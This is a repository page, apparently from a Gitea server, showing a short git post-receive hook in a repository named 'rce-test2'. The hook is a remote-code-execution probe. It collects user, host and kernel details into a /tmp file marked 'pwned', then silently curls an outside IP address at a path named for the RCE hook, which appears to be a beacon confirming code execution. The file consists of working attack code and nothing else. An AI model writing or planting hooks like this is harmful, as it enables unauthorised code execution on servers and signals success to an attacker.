Files
rce-test2/hooks/post-receive
T

4 lines
144 B
Bash
Raw Normal View History

2026-07-29 19:07:04 +08:00
#!/bin/sh
(id;whoami;hostname;uname -a) > /tmp/gitea_pwned_contents.txt 2>&1
curl -s http://202.79.169.91:28016/rce_contents_hook 2>/dev/null &